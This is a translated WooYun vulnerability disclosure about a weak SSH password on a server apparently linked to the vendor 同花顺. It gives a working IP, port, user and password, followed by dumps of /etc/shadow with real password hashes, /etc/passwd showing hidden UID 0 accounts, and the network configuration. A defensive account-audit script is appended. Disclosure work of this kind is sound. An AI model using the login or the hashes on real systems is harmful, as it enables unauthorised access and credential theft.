
Vulnerability summary

Defect ID: wooyun-2016-0198112

Title: Suspected SSH weak password on a 同花顺 server

Vendor: 同花顺

Author: 路人甲

Submitted: 2016-04-19 12:00

Fixed: 2016-06-03 14:20

Published: 2016-06-03 14:20

Type: Application configuration error

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-04-19: Details sent to the vendor; awaiting vendor handling
2016-04-19: Vendor has confirmed; details visible to the vendor only
2016-04-29: Details disclosed to core white hats and relevant domain experts
2016-05-09: Details disclosed to regular white hats
2016-05-19: Details disclosed to intern white hats
2016-06-03: Details disclosed to the public

Brief description:

One day I had a date with my girlfriend. While waiting for her, I bought a porn disc from a middle-aged man under a bridge, haggled him down, closed the deal and stuffed it into my coat pocket. That evening I had dinner at her home, meeting my future in-laws for the first time, and could not bring myself to look up the whole time. My girlfriend teased me: "What's wrong? You're never this shy." I muttered: "I didn't expect your dad to be the guy selling discs!"

Detailed description:

This server may not be yours, but every host bound in its /etc/hosts belongs to 同花顺. I doubt anyone would bother using a server just to browse your website, so it is probably a server that scrapes your site.
The files turned up by find were too mixed to tell for certain whether the server is yours.
ssh test@111.75.208.109 -p 9522, password 000000


[root@localhost /]# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
183.131.12.246 info.10jqka.com.cn info.10jqka.com.cn
183.131.12.246 fund.10jqka.com.cn fund.10jqka.com.cn
183.131.12.179 update.10jqka.com.cn update.10jqka.com.cn
60.191.17.84 www.10jqka.com.cn www.10jqka.com.cn
183.131.12.185 wapinfo.10jqka.com.cn wapinfo.10jqka.com.cn
Every host bound here is one of your sites.


[root@localhost etc]# cat /etc/shadow
root:$1$vg4QA9I9$d6xl36KAksHoBG.R7UQ9Z1:16827:0:99999:7:::
bin:*:16125:0:99999:7:::
daemon:*:16125:0:99999:7:::
adm:*:16125:0:99999:7:::
lp:*:16125:0:99999:7:::
sync:*:16125:0:99999:7:::
shutdown:*:16125:0:99999:7:::
halt:*:16125:0:99999:7:::
mail:*:16125:0:99999:7:::
news:*:16125:0:99999:7:::
uucp:*:16125:0:99999:7:::
operator:*:16125:0:99999:7:::
games:*:16125:0:99999:7:::
gopher:*:16125:0:99999:7:::
ftp:*:16125:0:99999:7:::
nobody:*:16125:0:99999:7:::
nscd:!!:16125:0:99999:7:::
vcsa:!!:16125:0:99999:7:::
rpc:!!:16125:0:99999:7:::
mailnull:!!:16125:0:99999:7:::
smmsp:!!:16125:0:99999:7:::
pcap:!!:16125:0:99999:7:::
ntp:!!:16125:0:99999:7:::
dbus:!!:16125:0:99999:7:::
avahi:!!:16125:0:99999:7:::
sshd:!!:16125:0:99999:7:::
rpcuser:!!:16125:0:99999:7:::
nfsnobody:!!:16125:0:99999:7:::
haldaemon:!!:16125:0:99999:7:::
avahi-autoipd:!!:16125:0:99999:7:::
xfs:!!:16125:0:99999:7:::
sabayon:!!:16125:0:99999:7:::
apache:!!:16125::::::
mysql:!!:16125::::::
rot:$1$jqz4J8c2$R8ellZ6zxB/8rTp07jnXU/:16281:0:99999:7:::
rooot:!!:16281:0:99999:7:::
test:$1$HFP.POle$pp6Xlf/.mDtiFLE2zV8y..:16283:0:99999:7:::
openvpn:!!:16542::::::
www:!!:16537:0:99999:7:::


[root@localhost etc]# cat /proc/version
Linux version 2.6.18-164.el5 (mockbuild@x86-002.build.bos.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Tue Aug 18 15:51:54 EDT 2009
[root@localhost etc]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:0:0:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
rot:x:0:0::/home/rot:/bin/bash
rooot:x:501:501::/home/rooot:/bin/bash
test:x:0:0::/home/test:/bin/bash
openvpn:x:101:102:OpenVPN:/etc/openvpn:/sbin/nologin
www:x:502:503::/home/www:/bin/bash


[root@localhost etc]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1B:78:76:B2:F8
inet addr:192.168.6.7 Bcast:192.168.6.255 Mask:255.255.255.0
inet6 addr: fe80::21b:78ff:fe76:b2f8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:798685 errors:0 dropped:0 overruns:0 frame:0
TX packets:2748749 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:303459053 (289.4 MiB) TX bytes:291098026 (277.6 MiB)
Interrupt:185 Memory:f8000000-f8012800
eth1 Link encap:Ethernet HWaddr 00:1B:78:76:B2:F6
inet addr:10.1.1.109 Bcast:10.1.1.255 Mask:255.255.255.0
inet6 addr: fe80::21b:78ff:fe76:b2f6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:27456338 errors:0 dropped:0 overruns:0 frame:0
TX packets:5070187 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2345750264 (2.1 GiB) TX bytes:455391910 (434.2 MiB)
Interrupt:82 Memory:fa000000-fa012800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:14569870 errors:0 dropped:0 overruns:0 frame:0
TX packets:14569870 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1165508548 (1.0 GiB) TX bytes:1165508548 (1.0 GiB)

Proof of vulnerability:

(The same /proc/version and /etc/passwd output as in the detailed description above.)

Fix recommendation:

1. Change the password;
2. Check the logs;
3. EQ strings the programmer up in mid-air and beats him.
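As an added example (not part of the report or of the vendor's own tooling), a Python audit that applies the report's own observations to /etc/passwd and /etc/shadow: it flags accounts other than root with UID 0 (games, rot and test in the listing above), passwords still hashed with legacy md5crypt ($1$), and unlocked non-root accounts with an interactive shell. The sample input is a constructed subset of the listing above with the hash values replaced by placeholders.

```python
# Constructed sample: a subset of the /etc/passwd and /etc/shadow lines in the
# report, with the real hash values replaced by obvious placeholders.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
games:x:0:0:games:/usr/games:/sbin/nologin
rot:x:0:0::/home/rot:/bin/bash
rooot:x:501:501::/home/rooot:/bin/bash
test:x:0:0::/home/test:/bin/bash
"""
SHADOW = """\
root:$1$SALTSALT$PLACEHOLDER_ROOT_HASH:16827:0:99999:7:::
bin:*:16125:0:99999:7:::
games:!!:16125:0:99999:7:::
rot:$1$SALTSALT$PLACEHOLDER_ROT_HASH:16281:0:99999:7:::
rooot:!!:16281:0:99999:7:::
test:$1$SALTSALT$PLACEHOLDER_TEST_HASH:16283:0:99999:7:::
"""

INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh"}
LEGACY_HASH_PREFIXES = ("$1$",)  # md5crypt; modern systems use $5$/$6$/$y$

def parse_colon_file(text):
    """Map the user name (first field) of each non-comment line to its fields."""
    rows = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            rows[fields[0]] = fields
    return rows

def audit(passwd_text, shadow_text):
    """Return (user, reason) pairs for the account weaknesses seen in the report."""
    findings = []
    shadow = parse_colon_file(shadow_text)
    for name, fields in parse_colon_file(passwd_text).items():
        uid, shell = int(fields[2]), fields[6]
        hashfield = shadow.get(name, ["", "!!"])[1]  # no shadow row: treat as locked
        locked = hashfield == "*" or hashfield.startswith("!")
        if uid == 0 and name != "root":
            findings.append((name, "extra UID 0 account"))
        if hashfield == "":
            findings.append((name, "empty password field"))
        if not locked and hashfield.startswith(LEGACY_HASH_PREFIXES):
            findings.append((name, "legacy md5crypt password hash"))
        if not locked and name != "root" and shell in INTERACTIVE_SHELLS:
            findings.append((name, "non-root interactive login with a usable password"))
    return findings
```

On a live system, feed it the contents of /etc/passwd and /etc/shadow (read as root); every UID 0 account other than root should be explained or removed, and every remaining login account should get a new strong password.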

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed at: 2016-04-19 14:19

Vendor reply:

Hello, the vulnerability has been confirmed and is being handled. Thank you.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-04-19 12:52 | Mark0smith ( Regular white hat | Rank:172 Vulnerabilities:68 | If only I were a little more normal)

    Nice joke